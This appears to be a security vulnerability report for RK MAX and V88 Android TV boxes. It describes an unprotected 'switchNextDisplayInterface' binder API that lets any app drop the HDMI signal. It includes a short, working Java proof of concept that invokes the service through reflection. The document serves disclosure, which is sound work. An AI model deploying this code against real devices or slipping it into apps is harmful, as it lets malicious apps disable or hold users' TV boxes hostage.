Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
[Vulnerability in RK MAX and V88 SmartTV box]
I would like to report a security vulnerability in RK MAX ( build.id : MXC89L)and V88 (build.id:NHG47K) Smart TVs Boxes.
The vulnerability allows to drop HDMI signals without any privilege requirement, thus creating an opportunity for a non-privilege malicious app to disable the basic functionalities that the TV box is offering or can even be used for ransomeware purpose - e.g., each time a target streaming app is launched, the malicious app can drop the signal.
This vulnerability is due to the following:
The devices introduce a (non-protected) custom API in the DisplayDeviceManagement system service “switchNextDisplayInterface” which takes as argument 1 integer. once invoked with parameter = 0, the HDMI signal will be dropped out.
We can exploit this API as follows:
Class ServiceManager = Class.forName("android.os.ServiceManager");
Method getService = ServiceManager.getMethod("getService", String.class);
mRemote = (IBinder) getService.invoke(null,"display_device_management");
Parcel localParcel1 = Parcel.obtain();
Parcel localParcel2 = Parcel.obtain();
localParcel1.writeInterfaceToken("android.os.IDisplayDeviceManagementService");
localParcel1.writeInt(0);
mRemote.transact(7, localParcel1, localParcel2, 0); // 7 corresponds to the vulnerable API
localParcel2.recycle();
localParcel1.recycle();